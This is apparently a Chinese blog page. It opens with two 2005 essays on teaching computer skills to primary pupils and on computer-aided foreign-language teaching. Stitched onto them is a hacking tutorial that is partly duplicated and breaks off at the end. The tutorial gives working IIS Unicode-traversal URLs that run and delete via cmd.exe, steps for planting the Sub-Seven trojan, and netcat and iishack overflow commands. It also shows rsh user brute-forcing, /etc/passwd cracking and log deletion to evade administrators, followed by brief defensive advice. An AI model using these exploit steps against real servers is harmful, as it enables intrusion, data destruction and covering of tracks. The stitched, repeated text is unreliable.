2005年08月24日

浅谈小学生计算机操作技能的培养

十年前,邓小平同志指出:“计算机要从娃娃抓起”。这是为了适应科学技术现代化日新月异的发展所作的具有战略意义的决策。十年来,随着改革开放的深入和经济建设的发展,在我国,计算机已逐渐从科研单位的金字塔尖走向社会、学校、家庭,操作也由成人推广到小学生,并且形成了一股学习计算机、使用计算机的热潮。小学的计算机教学还没有一定的模式可循,无论是小学各阶段的教学内容、教学方法,还是这门课的教学形式,都需要我们教师在教学中不断摸索。

根据实际的教学环境和教学对象,再针对这门学科的特点,选择教学内容和制订教学计划,不断改进课堂教学。实现小学阶段计算机教学的根本任务–培养学生初步的计算机操作技能。

一、培养学生计算机的操作技能,首要任务是确定一系列符合学生认知心理特点的教学内容。具体说,低年级宜以熟悉键盘、训练指法为主,以益知游戏和配合语文、数学教学为主要操作内容;中年级宜认识电脑各部分,提高学生键盘、指法的熟练程度为本,主要采用一些国产教学软件,如《英打练习》、《跟我学DOS》等,同时可以有步骤地教学拼音类汉字输入法和简单的DOS命令;高年级可以正式开始学习重码较少的汉字输入法,如配合学生认字、写字的认知码、音形序码(华码)等,同时学习简单的WPS文字处理软件的使用。

二、培养学生计算机的操作技能。关键在于深入了解学生,刻苦钻研教学形式和教学方法。

在确定教学形式方法之前,首先要克服部分学生已有的畏难心理。因为有部分家长对计算机接触不多,也不甚了解,难免主观猜测,对学生是否能学会计算机操作产生疑问,而学生对此认识较为模糊:有的受家长影响产生畏难情绪,有的认为学习计算机无非就是打打键盘玩游戏,有的缺乏明确的学习目的,一时盲从冲动……教师针对以上问题,需讲清计算机操作重要性,学习计算机的目的,使学生端正学习态度。树立良好的信心。

其次,要认识到学生的年龄小,缺乏必要的知识经验,直观思维还处于主导地位,不易理解较深的理论和概念,讲解实际的操作。尽量使用教学辅助软件进行直观教学。

第三,计算机教学要寓教于乐,寓学于乐。我们的计算机教学要使得学生在具体操作中了解基本软、硬件知识,掌握基本操作技能。而单调的理论概念教学和重复乏味的操作则让学生失去兴趣,丧失学习的积极性,这就要求我们教师通过经常交替更换练习内容,使他们有所选择。在学习一段时间以后,再使用一些短孝趣味性强且操作简单的CAI软件,让学生在游戏中练习。达到培养操作技能的目的。

如中年级练习英打,熟练键盘、巩固指法时,可同时使用二到三种不同的“英打CAI软件”交替练习,主要进行基本功训练。让学生在游戏中觉得紧张、刺激,有得高分或取得胜利的愿望。实践结果,正是这种“想得高分”的心理驱使学生自觉地、生动活泼地培养了自己的操作技能。

第四,计算机教学要遵循其实践性强的特点,精讲多练,重操作、多动手。

计算机作为一种智慧型的功能更全面的工具,而只需教给小学生如何使用这一工具的简单功能。所以无法沿用文化课的现存模式。只有通过边讲解边示范的方法,让学生清楚地观察到每一步操作的效果,然后学生自己上机操作验证。这个过程解决了学生心中“如何做”的问题。而对概念一类问题可一带而过,不必作过多超过他们理解力的“论述”。让学生在自己上机操作过程中去理解掌握。

应注意的是教师讲解示范后,必须让学生趁热打铁,马上上机验证和巩固。

同样学生也有这种迫切的心情,希望立即上机去证实他所听到或观察到的操作效果。教师还应尽可能留足够的时间给学生上机。在上机过程中,教师要巡回辅导,鼓励学生大胆动手,即使出现了由误操作所导致的异常情况,教师也不应训斥学生,而是指出“误操作是由于不熟练产生的”,让学生感觉到教师对他的期望,增强学生学习的主动性和创造性。

第五,练习中要善于创设问题,巩固教学内容,同时做到循序渐进。接受新知。教师教学中,教师不能只限于学生当堂上机验证过了,就认为他们掌握了。

而需精心设计一些练习,有意创设问题,让学生用所学的操作知识来上机解决这些问题。如做得好,学生会惊喜地发现:“我学到的东西还挺管用的”。从而也就完成了知识内化的过程。例如高年级在学习wps中的“插入、删除”操作时,可设计这样三个由浅入深的练习:1、字符的插入和删除;2、行的插入和删除;3、断行、并行—-插入、删除操作的进一步应用。文字内容可使用学生学过的课文诗歌等。

另外,针对有些计算机内容之间缺少顺序和关联性,如DOS和WPS就完全不同。

教师在教一个新内容时要做到逐步渗透下一个内容的有关知识,让学生在学习下一个知识时以有似曾相识的感觉。

如在教学DOS以前,若能让学生理解磁盘、磁盘文件等概念,了解文件是贮存在磁盘中的,磁盘中可以存放多个文件,文件可以修改、复制和删除等,那么当系统学习DOS时学生就比较轻松,在有意无意中接受,并由陌生到熟悉。再如在中年级教学拼音类汉字输入法时,说明重码较多,如选择双拼、简拼汉字输入法,可以减少重码,提高输入速度。这样不但给学生想学一快速有效的汉字输入法的愿望,而且在学习双拼、简拼输入法时不觉得陌生、难学了,也能很快地、有兴趣地学习这些汉字输入法。

三、计算机教学中要因材施教,为培养特色人才服务。在普遍培养学生计算机操作能力的同时,应认真开展兴趣小组活动,为有条件的学生提供有利于智力发展和学习更多计算机知识培养更强的操作技能的机会。给他们讲授一些编程语言及编程方法,如BASIC编程语言的基本语法、函数、程序编译规则等。同时组织一些生动活泼的竞赛评比活动,使他们从中获得成功的喜悦。为将来学生使用计算机帮助自己学习,扩大计算机语言视野,进一步掌握计算机专业知识打好基础,也使这些学生成为学校大有希望的计算机“娃娃兵”。

实践证明:小学的计算机教学只要讲究方式、方法,就能使小学生掌握初步的计算机操作技能的同时也能配合教师在其他各科进行计算机辅助教学,而且能激发学生爱科学、学科学的情趣,培养学生健康的爱好,锻炼学生手脑并用的能力,拓宽学生的思路,开发学生的智力,并为将来的进一步学习奠定坚实的基矗(南京陈佐华)""浅谈微机辅助教学在外语教学中的运用""浅谈微机辅助教学在外语教学中的运用微机技术是八、九十年代最新的应用技术,经过十几年来的发展,微机的应用技术已经非常成熟。这些技术可以把文字、图像、语音融合到教学当中,既可以生动高效地进行外语教学,又能使学生掌握和运用微机技术,让学生爱听、爱读、爱学,有效地提高教学质量和授课效果。

一、在外语教学中引入微机应用技术会产业什么效果
以往的外语教学中,存在着先记住大量的单词和语法、背诵大量的习惯用法和词组等做法,而往往忽视教学的趣味性和课堂效果,造成教师尽心尽力准备的内容,不能被学生很好的领会。这是因为外语这种语言教学不像化学、物理等课可以做大量的实验,在形象、生动、趣味性很强的课堂环境下使授课产生事半功倍的效果。而在裸堂上放一台多媒体的微机,装人对应教材的教学软件,就可以通过屏幕的画面、实景、字幕、音乐和语音对白,让课文“活”起来。教师可以采用学生喜欢的方式来“导演”课文,同时对课文进行生动、形象的“活外音”式的解释和翻译,指出重点和难点,对于关键段落可以反复播放,给学生介绍背景资料,使学生的注意力最大限度地集中到教师指引的地方,创造一个良好的课堂氛围,极大地鼓励学生的自信心和主动性,加深课堂知识的印象,使学生在和谐、轻松、高效的课堂教学中掌握大量知识。

二、让微机辅助教学最大限度地在外语教学中发挥作用
在21世纪,能够熟练地使用微机将同人们会读书、写字一样成为一项基本技能。现在许多大专院校、初、高级中学和小学都配备了微机等现代化教学设备,为了让这些微机设备在外语教学中发挥更大的作用,应注重在以下几方面多下功夫。

1.利用微机辅助教学进行集体辅导和个别辅导。利用微机辅导学生,既可以控制教学进度,又可以辅导学生练习;既利于教学,又利于复习。微机辅助教学将帮助学生进行自检自查,使学生全面要求自己,务求答案精确。微机教学中的计算机程序会以“对”或“错”的方式对学生的答题给予评价,从而有利于学生逐渐找到正确的答案。微机的反馈信息将会使学生按自己的进度独立地完成课程的学习,强化学习效果。

2.利用微机辅助教学进行基础训练、课程辅导、单元测试、模拟考试、情形对话等训练基本技能。微机对于学生来说是一个极有耐心的教师,要充分利用微机的使用方便、训练精确和教学软件适应范围广泛等特征,开展好包括基础训练、单元测验、模拟考试在内的多种基本能力训练,针对学生的不足进行强化辅导,让微机辅助练习真正成为课堂教学的有益补充。

3.利用微机进行贴近生活的情景模拟练习,最大限度地激发学生的参与意识。微机模拟是行之有效的学习工具,利用微机进行情景模拟练习可以节省大量的人力筹划和表演的时间。让微机通过集中的画面提供丰富多采的情景,如重现历史画面、展示日常风情、特别庆祝节目等等。都可以通过计算机模拟得以实现。

情景模拟丰富了教学内容,加强了教育效果,活跃了学习气氛。

4.还可以应用微机做试题的制卷、判卷等有关考试的大量繁重工作。试题的制卷、评分、综合评估等工作都可以通过微机来实现。而这些大量、繁重、要求精确的工作恰恰是微机胜于人的地方,这样教师会有更多的时间在优化教学内容,发展个人爱好,引导学生掌握学习的技能等方面,下更多的功夫。

三、在利用微机辅助教学的工作中,对在职教师和即将步入岗位的教师进行培训是十分重要的
高等师范院校应有计划地开设正规的计算机课程,并强化其学习和实践。学校自己要积极开设微机语言、微机编程等课程,并提供相应的上机场地。地方高校职业学校以及教师进修学校也要为那些有意提高自身微机水平的教师提供有利条件。如果教师们对微机教学感兴趣并精通其业务,那么师生都会热情投入到这项工作中去。有计算机天赋的教师可以自行设计并剪辑相关节目,以满足各种不同层次的教学要求。教师亦可加工软件,并与同事们进行交流。学生也可以协助教师进行软件开发,从而使学生具有竞争性,并强化从前所学过的知识。

微机如能在我国大范围地引入到外语教学中,将会大大提高学生的学习兴趣,激发学生的学习动力,活跃课堂气氛,增强学生的求知欲。在提供多样的教学方式,增强教学效果,激发学习兴趣方面,微机都是行之有效的。而且现在各种微机教学软件层出不穷,提供了极为丰富的软件教学基础,给利用微机技术进行教学创造了良好的机遇。

2005年08月22日

第二节、实际攻击
一、中美黑客对战中的UNICODE漏洞利用:
   2001年4月开始,中美黑客又一次在网络上展开了没有硝烟的战斗,这次黑客攻击主要是依靠UNICODE漏洞,利用这个漏洞黑客可以远程调用服务器的cmd命令解释器,对服务器磁盘进行各种操作,配合上传的木马等程序,这个漏洞载当时给互联网带来的威胁是巨大的。
   1、UNICODE原理:
   此漏洞从中文IIS4.0+SP6开始出现,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。UNICODE是一种编码格式,它可以用两组代码编制一个字符,例如下面在中文Windows2000中的编码规则就是黑客需要利用到的:
       %c1%1c -〉 (0xc1 – 0xc0) * 0×40 + 0×1c = 0×5c = ‘/’
       %c0%2f -〉 (0xc0 – 0xc0) * 0×40 + 0×2f = 0×2f = ‘\’
   黑客利用“%c1%1c”和“%c0%2f”两个不完整的编码,通过系统转换可以得到正、反斜杠,这样就可以访问远程服务器上的为开放的目录内容了。例如对于http://www.acc.com/来说,它的webroot目录如果是c:\webroot\,那么当黑客使用http://www.acc.com/scripts/..%c1%1c../winnt/system32/cmd.exe实际上被编码之后是:http://www.acc.com/scripts/../../winnt/system32/cmd.exe,也就是说黑客直接通过浏览器就调用了服务器上的cmd命令解释器,获得了远程执行命令的权限。
   2、检测方法:
   如果怀疑某个网站存在这个程序,可以通过下面的方法进行检测:
   http://www.pim.cn/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
   如果系统的确存在漏洞的话,那么浏览器返回的内容将会是对方系统的硬盘目录内容,注意因为UNICODE在不同的系统中有不同的编码,所以不能依靠一组代码确定服务器上不存在这个漏洞。这个时候扫描器就派上了大用场,使用xscanner可以专门对多个UNICODE进行检测,它的使用参数是“-iis”。
   3、分析漏洞:
   获得了控制台命令的执行权限,就意味着黑客可以执行dir、copy、echo、net等多个命令,也就是说黑客可以浏览、删除服务器硬盘上的文件,还可以使用net命令打开服务器的某个目录的共享状态,然后上传木马并继续使用控制台命令调用木马。
   例如http://www.acc.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\game可以使用dir命令列出服务器的c:\game目录中(如果有的话)的文件列表,将“/c+dir+”更改成“/c+del+”既可以删除后面指定的文件了。
   4、完整利用:
   现在假设学习者手中拥有sub-seven木马和一台已经确认具有UNICODE漏洞的服务器,之后所要做的事情就是单纯的利用浏览器和木马程序就可以完全控制服务器了。
   首先利用扫描器找到一台具有IISCODE漏洞的服务器(例如http://www.bnc.org/),然后通过浏览器完成下面的工作:
   http://www.bnc.org/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
   这样可以通过漏洞看到硬盘上的文件列表,地址行中的“..%c1%1c..”在不同的系统中可能不同,它的意思是经过UNICODE编码转变成符号“../..”,如果看到了文件列表说明漏洞的确存在,之后将cmd.exe文件复制到scripts目录下:
   /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\webroot\scripts\abc.exe
   这样就将cmd.exe程序保存到scripts/目录下,并且将它的文件名更改为abc.exe,如果不更改名称,系统将不会在其他目录中运行cmd.exe。这之后可以用/scripts/abc.exe?/c+dir+c:\game等形式直接调用cmd.exe命令。
   使用cmd.exe配合net命令可以在对方的系统上开辟一个共享目录,这个目录可以设置为整个驱动器,有关net use的介绍已经在第二章中提到,在这里不再过多做解释。开辟了共享目录后,既可以通过“网上邻居”直接连接到对方的系统上\\www.bnc.org\,之后上传木马程序sub-seven的服务端到scripts下。
   最后调用并激活木马程序/scripts/sub-seven.exe,这样所有入侵工作全部完成了。之后在本地电脑上运行sub-seven的客户端程序,并在IP地址内输入对方的IP,控制对方系统。进入系统之后,要注意删除c:\winnt\log下的日志文件,这样系统管理员就不会发现此次入侵活动了。
二、更多的漏洞:
   上面介绍的是通过UNICODE漏洞进行入侵的过程,在微软的IIS中还有更多的漏洞可以利用:
   1、Null.htw
   IIS如果运行了Index Server就包含了一个通过Null.htw有关的漏洞,即服务器上不存在此.htw结尾的文件。这个漏洞会导致显示ASP脚本的源代码,global.asa里面包含了用户帐户等敏感信息。如果攻击者提供特殊的URL请求给IIS就可以跳出虚拟目录的限制,进行逻辑分区和ROOT目录的访问。而这个“hit-highlighting”功能在Index Server中没有充分防止各种类型文件的请求,所以导致攻击者访问服务器上的任意文件。Null.htw功能可以从用户输入中获得3个变量:CiWebhitsfile、CiRestriction、CiHiliteType,可通过下列方法传递变量来获得任意asp文件的源代码:
   http://www.sample.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full其中不需要一个合法的.htw文件是因为虚拟文件已经存储在内存中了。
   2、MDAC执行本地命令漏洞:
   这个漏洞出现得比较早,但在全球范围内,可能还有好多IIS WEB服务器存在这个漏洞,就像在今天还有很多人在用Windows3.2一样。IIS的MDAC组件存在一个漏洞,可以导致攻击者远程执行目标系统的命令。主要核心问题是存在于RDSDatafactory,默认情况下,它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,在默认情况下是SYSTEM用户。黑客通过以下办法测试本机是否存在这个漏洞:
   c:\>nc -nw -w 2 <目标机> 80
   GET /msadc/msadcs.dll HTTP
   如果得到信息“application/x_varg”就很有可能存在此漏洞且没有打上补丁,可以使用rain forest puppy网站的两个程序进行测(www.wiretrip.net/rfp)==>mdac.pl和msadc2.pl。
   3、idc、ida 漏洞:
   这个漏洞实际上类似于早期的ASP dot漏洞,其能在IIS4.0上显示WEB目录信息,很奇怪有些人还在IIS5.0上发现过此类漏洞,通过增加?idc?或者?ida?后缀到URL会导致IIS尝试允许通过数据库连接程序.DLL来运行.IDC,如果此.idc不存在,它就返回一些信息给客户端,检测漏洞方法是:http://www.sample.com/anything.idc 或者 http://www.sample.com/anything.idq
   4、IIS HACK
   有人发现了一个IIS4.0的缓冲溢出漏洞,可以允许用户上载程序,如上载netcat到目标服务器,并把cmd.exe绑定到80端口。这个缓冲溢出主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到站点www.technotronic.com中去下载,另外你还需要一台自己的WEB服务器,也可以是虚拟服务器。先在自己的WEB服务器上运行WEB服务程序并把ncx.exe放到相应的目录下,然后使用iishack.exe来检查目标机器:c:\>iishack.exe <目标机> 80 <自己的WEB服务器>/ncx.exe
   然后使用netcat来连接要检测的服务器:c:\>nc <目标机> 80,如果溢出点正确,就可以看到目标机器的命令行提示,并且是远程管理权限。
   5、Codebrws.asp和Showcode.asp:
   这是两个IIS4.0附带的阅读文件程序,但不是默认安装的,这个查看器是在管理员允许查看样例文件作为联系的情况下安装的。但是这个查看器并没有很好地限制所访问的文件,远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容,但要注意以下几点:
   (1)Codebrws.asp 和 Showcode.asp默认情况下不安装;
   (2)漏洞仅允许查看文件内容;
   (3)这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制;
   (4)只允许同一分区下的文件可以被查看;
   (5)攻击者需要知道请求的文件名。
   例如你发现存在这个文件并符合上面的要求,则可以请求如下的命令察看asp源代码:
   http://www.sample.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
   http://www.sample.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
三、如何防范IIS漏洞:
   由于微软的IIS是一套商业软件,他们并没有公开这套软件的源代码,所以软件的补丁程序只能等待微软公司在它的产品升级主页下载,这比起Apache等开放源代码的应用程序,可能在安全性上体现的更差,这也正是为什么黑客都说“微软的东西玩儿起来没有意思”,因为这个被封闭的很严的软件产品,既没有源代码可供黑客分析,一旦出现了问题也只能做一些基本的操作进行黑客(也就是上面的内容),这对初学黑客的人来说自然是一件好事情,但对高级黑客是不屑一顾的。
   微软公司的主页是http://www.microsoft.com/,但是没有很多人愿意从国外下载软件补丁回来,国内也有很多不错的网络安全主页,例如http://www.xfocus.orghttp://www.nsfocus.com/main.php等都是非常不错的,读者可以到这些站点阅读最新的安全公告或下载升级补丁。
   另外对于codebrws.asp等程序造成的安全问题,这不是产品本身存在漏洞,而属于管理员在安装软件是的疏忽造成的,因此管理员安装完系统之后,一定要使用漏洞扫描软件对自己的系统进行检测,确认没有提供任何存在问题的程序给使用者,对于codebrws.asp等软件如果必须安装,也可以更换文件名或改变它的目录位置,这样黑客就无法从漏洞扫描的途径发现这些文件的存在了。
四、另一次入侵过程:
   假设这次攻击的目标是www.soft.com,首先使用ping命令察看一下对方系统的应答时间ping www.soft.com
       Pinging www.soft.com [127.168.0.1] with 32 bytes of data:
       Reply from 127.168.0.1: bytes=32 time=425ms TTL=240
       Reply from 127.168.0.1: bytes=32 time=420ms TTL=240
       Reply from 127.168.0.1: bytes=32 time=419ms TTL=240
       Reply from 127.168.0.1: bytes=32 time=421ms TTL=240
   看上去,time还是比较快的,而且通过TTL猜测到对方使用的是Linux之类的系统,比较有挑战性。使用nc命令(NT中提供)登陆到其他主机上,这在黑客里的行话叫“跳板”,我到更觉得像是“借刀杀人”,因为登陆到其他服务器上进行攻击,那么收到攻击的服务器将会纪录下那个黑客登陆的服务器,而不会纪录黑客真正的IP地址,这样一旦追踪起来,黑客的真实位置不容易被发现。
   之后使用端口扫描程序对目标127.168.0.1进行扫描,看看它开放了什么端口:结果是开放了十多个端口,提供的服务越多、服务器存在漏洞的可能性就越大!之后分别用不同的检测方法检测每一个服务可能存在的漏洞,因为我们主要介绍80端口的攻击,所以其他攻击过程在这里设略,直接进行80端口的检测:
# (echo "head /http/1.0";echo;echo)|./nc -w 3 127.168.0.1 80
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<title>501 Method Not Implemented</title>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
head to /http/1.0 not supported.<P>
Invalid method in request head /http/1.0<P>
<HR>
<ADDRESS>Apache/1.3.9 Server at 127-168-0-1 Port 80</ADDRESS>
</BODY></HTML>
   看到<ADDRESS>内的系统版本了吗?这说明服务器的确使用的Linux等系统,而且服务器使用的是Apache版本,因为这是一套开放了源代码的软件,所以它被世界上所有顶尖黑客所关注,其中的漏洞很快会被发现,而相应的对策也能够及时出台,所以它从诞生到现在,更新速度是惊人的,其安全程度也是非常惊人的,存在漏洞的希望并不大,作为初学者一般应该放弃,但是我还是介绍一下剩下来的工作,让读者从感性上接触一下黑客攻击的全部过程。
   使用finger调出服务器上的用户列表,如果成功的话则可以使用+ username命令为自己增加一个用户登陆权限。使用下面的脚本将可能的用户列表逐个寻找出来:
       # chmod 700 rsh.sh
       # nohup ./rsh.sh www.targe.com
   这会自动的在/etc/passwd和/etc/shadow里加上finger出来的用户名,再对远程目标127.168.0.1执行rsh命令,成功则返回该用户名,这个操作需要很长的时间,也许是几个小时后也不能获得什么有用的信息,因此这里需要一点点运气。等待一段时间后,读取报告结果:
       # cat ./.rsh.txt
       guest
   报告结果文件“.rsh.txt”中获得了一个guest用户名(初学者很难有如此好的运气),通过rlogin登陆这个用户名看看有什么权限:
       # rlogin -l guest 127.168.0.1

       Last login: Fri Jan 12 03:01:10 from 61.135.50.24
       Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
       The Regents of the University of California. All rights reserved.

       FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 2001
       You have mail.
   到这里,我就已经登陆进入这台服务器了,现在我的权限可能还很小,不过已经能够称的上“入侵”了,后面的内容对初学者来说就真是没有介绍的必要了,因为后面牵扯的大多数命令都是初学者闻所未闻的,因此只做一个大概介绍。如果这个guest具有对/etc/passwd的访问权限,可以将passwd文件读取出来,这是Linux系统下纪录用户名和密码的文件,它的基本格式如下:
       root:*:0:0:Charlie &:/root:/usr/local/bin/bash
       guest:*:1005:2000::/home/www:/usr/local/bin/tcsh
       max:*:1006:1006::/home/max:/usr/local/bin/tcsh
       someone:*:1003:1003::/home/someone:/usr/local/bin/tcsh
   看到这个文件的话,就可以想办法获得shadow文件并利用JOHN等软件破解其中的DES加密密码,那是一个非常有意思的工作,主要是看自己的电脑速度和字典档案的优劣,很多黑客都是非常喜欢在自己的电脑上破解DES密码档案的,可以再一次使用破解出来的用户名登陆服务器,看看它的权限,直到找到最高的权限(完全控制服务器)。
   最后在离开服务器的时候,要清除日志文件,当然因为我们这次进攻是通过跳板的,所以不清楚日志管理员也很难找到我,再说我也没有进行让破坏,所以管理员并不会注意到这次进攻,在他看来只不过使用户guest登陆到服务器上随便看看又下去了。
五、保护密码:
   对于我们这些拨号上网的用户来说,最怕的就是有居心叵测的黑客对我们进行攻击了,如何能避免个人的利益遭到损坏呢?这里总结了一些我对密码保护的看法和防范密码泄漏的对策,希望对广大读者有一定的作用。
   1、经常修改密码
   密码是我们最重要的个人隐私,如果黑客知道了我们的上网密码或者Email密码,那我们将无任何隐私可言,所以一定要选择一个比较好的密码,同时还要经常更换。一般来说,大多数人喜欢选择一些比较容易记忆的英文单词,这是非常不安全的,黑客不用什么高深的手法,只要用软件进行猜测,用不了半个小时,五位的英文单词就会被他们猜出来,所以一定要选择一个毫无意义的字符排列作为密码。这里有几条规则:
   (1)好的密码应该很长,至少七位或者八位;
   (2)有必要经常更换密码,每月改变一次自己的密码将是非常明智的选择;
   (3)密码不要单独依靠字符、数字,应该尽量混合所有的符号;
   (4)英文字母不要使用单词,应该使用没有任何规律的随机排列;
   (5)不要使用例如生日、电话号码等数字作为密码;
   (6)英文字母应该大小写都出现;
   (7)给出一个比较好的密码形式:
   2、使用“拨号后出现终端窗口”功能
   这种方法的好处是不会将密码文件保存到电脑中,如果让电脑自动完成拨号功能,那么系统将会把您的密码保存到一个扩展名为pwl 的文件中,这样一来,有经验的人很快就可以通过特殊方法获得您的pwl 文件并找到其中的密码。具体使用“拨号后出现终端窗口”的方法如下:
   选中某一连接图标,单击鼠标右键,选“属性- 常规- 配置- 选项- 拨号后出现终端窗口”,然后拨号时,在拨号界面上不要填入用户名和密码(更不要选中“保存密码”项),在出现拨号终端窗口后再进行相应的输入,这可以避免用户名和密码被记录到硬盘上的密码文件中,同时,也可以避免被某些黑客程序捕获用户名和密码。
   3、对付特洛伊木马
   特洛伊木马程序常被定义为当执行一个任务时却实际上执行着另一个任务的程序,典型的一个例子是:伪造一个登录界面,当用户在这个界面上输入用户名和密码时,程序将它们转移到一个隐蔽的文件中,然后提示错误要求用户再输入一遍,程序这时再调用真正的登录界面让用户登录,于是在用户几乎毫无察觉的情况下就得到了记录有用户名和密码的文件。现在互联网上有许多所谓的特洛伊木马程序,像著名的BO、Backdoor、Netbus及国内的Netspy等等。严格地说,它们属于客户机/服务器(C /S )程序,因为它们往往带有一个用于驻留在用户机器上的服务器程序,以及一个用于访问用户机器的客户端程序,就好像NT的Server和Workstation 的关系一样。
   在对付特洛伊木马程序方面,有以下几种办法:
   (1)多读readme.txt
   许多人出于研究目的下载了一些特洛伊木马程序的软件包,在没有弄清软件包中几个程序的具体功能前,就匆匆地执行其中的程序,这样往往就错误地执行了服务器端程序而使用户的计算机成为了特洛伊木马的牺牲品。软件包中经常附带的readme.txt文件会有程序的详细功能介绍和使用说明,尽管它一般是英文的,但还是有必要先阅读一下,如果实在读不懂,那最好不要执行任何程序,丢弃软件包当然是最保险的了。有必要养成在使用任何程序前先读readme.txt的好习惯。
   值得一提的是,有许多程序说明做成可执行的readme.exe形式,readme.exe往往捆绑有病毒或特洛伊木马程序,或者干脆就是由病毒程序、特洛伊木马的服务器端程序改名而得到的,目的就是让用户误以为是程序说明文件去执行它,可谓用心险恶。所以从互联网上得来的readme.exe最好不要执行它。
   (2)使用杀毒软件
   现在国内的杀毒软件都推出了清除某些特洛伊木马的功能,如KV300 、KILL98、瑞星等等,可以不定期地在脱机的情况下进行检查和清除。
   另外,有的杀毒软件还提供网络实时监控功能,这一功能可以在黑客从远端执行用户机器上的文件时,提供报警或让执行失败,使黑客向用户机器上载可执行文件后无法正确执行,从而避免了进一步的损失。
   (3)立即挂断
   尽管造成上网速度突然变慢的原因有很多,但有理由怀疑这是由特洛伊木马造成的,当入侵者使用特洛伊的客户端程序访问你的机器时,会与你的正常访问抢占宽带,特别是当入侵者从远端下载用户硬盘上的文件时,正常访问会变得奇慢无比。这时,你可以双击任务栏右下角的连接图标,仔细观察一下“已发送字节”项,如果发送字节变化在1 ~3kbps (每秒1 ~3 千字节),几乎可以确认有人在下载你的硬盘文件,除非你正在使用ftp功能。对TCP/IP端口熟悉的用户,可以在“MS-DOS 方式”下键入“netstat -a”来观察与你机器相连的当前所有通信进程,当有具体的IP正使用不常见的端口(一般大于1024)与你通信时,这一端口很可能就是特洛伊木马的通信端口。当发现上述可疑迹象后,你所能做的就是:立即挂断,然后对硬盘有无特洛伊木马进行认真的检查。

第二节、实际攻击
一、中美黑客对战中的UNICODE漏洞利用:
   2001年4月开始,中美黑客又一次在网络上展开了没有硝烟的战斗,这次黑客攻击主要是依靠UNICODE漏洞,利用这个漏洞黑客可以远程调用服务器的cmd命令解释器,对服务器磁盘进行各种操作,配合上传的木马等程序,这个漏洞载当时给互联网带来的威胁是巨大的。
   1、UNICODE原理:
   此漏洞从中文IIS4.0+SP6开始出现,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。UNICODE是一种编码格式,它可以用两组代码编制一个字符,例如下面在中文Windows2000中的编码规则就是黑客需要利用到的:
       %c1%1c -〉 (0xc1 – 0xc0) * 0×40 + 0×1c = 0×5c = ‘/’
       %c0%2f -〉 (0xc0 – 0xc0) * 0×40 + 0×2f = 0×2f = ‘\’
   黑客利用“%c1%1c”和“%c0%2f”两个不完整的编码,通过系统转换可以得到正、反斜杠,这样就可以访问远程服务器上的为开放的目录内容了。例如对于http://www.acc.com/来说,它的webroot目录如果是c:\webroot\,那么当黑客使用http://www.acc.com/scripts/..%c1%1c../winnt/system32/cmd.exe实际上被编码之后是:http://www.acc.com/scripts/../../winnt/system32/cmd.exe,也就是说黑客直接通过浏览器就调用了服务器上的cmd命令解释器,获得了远程执行命令的权限。
   2、检测方法:
   如果怀疑某个网站存在这个程序,可以通过下面的方法进行检测:
   http://www.pim.cn/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
   如果系统的确存在漏洞的话,那么浏览器返回的内容将会是对方系统的硬盘目录内容,注意因为UNICODE在不同的系统中有不同的编码,所以不能依靠一组代码确定服务器上不存在这个漏洞。这个时候扫描器就派上了大用场,使用xscanner可以专门对多个UNICODE进行检测,它的使用参数是“-iis”。
   3、分析漏洞:
   获得了控制台命令的执行权限,就意味着黑客可以执行dir、copy、echo、net等多个命令,也就是说黑客可以浏览、删除服务器硬盘上的文件,还可以使用net命令打开服务器的某个目录的共享状态,然后上传木马并继续使用控制台命令调用木马。
   例如http://www.acc.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\game可以使用dir命令列出服务器的c:\game目录中(如果有的话)的文件列表,将“/c+dir+”更改成“/c+del+”既可以删除后面指定的文件了。
   4、完整利用:
   现在假设学习者手中拥有sub-seven木马和一台已经确认具有UNICODE漏洞的服务器,之后所要做的事情就是单纯的利用浏览器和木马程序就可以完全控制服务器了。
   首先利用扫描器找到一台具有IISCODE漏洞的服务器(例如http://www.bnc.org/),然后通过浏览器完成下面的工作:
   http://www.bnc.org/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
   这样可以通过漏洞看到硬盘上的文件列表,地址行中的“..%c1%1c..”在不同的系统中可能不同,它的意思是经过UNICODE编码转变成符号“../..”,如果看到了文件列表说明漏洞的确存在,之后将cmd.exe文件复制到scripts目录下:
   /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\webroot\scripts\abc.exe
   这样就将cmd.exe程序保存到scripts/目录下,并且将它的文件名更改为abc.exe,如果不更改名称,系统将不会在其他目录中运行cmd.exe。这之后可以用/scripts/abc.exe?/c+dir+c:\game等形式直接调用cmd.exe命令。
   使用cmd.exe配合net命令可以在对方的系统上开辟一个共享目录,这个目录可以设置为整个驱动器,有关net use的介绍已经在第二章中提到,在这里不再过多做解释。开辟了共享目录后,既可以通过“网上邻居”直接连接到对方的系统上\\www.bnc.org\,之后上传木马程序sub-seven的服务端到scripts下。
   最后调用并激活木马程序/scripts/sub-seven.exe,这样所有入侵工作全部完成了。之后在本地电脑上运行sub-seven的客户端程序,并在IP地址内输入对方的IP,控制对方系统。进入系统之后,要注意删除c:\winnt\log下的日志文件,这样系统管理员就不会发现此次入侵活动了。
二、更多的漏洞:
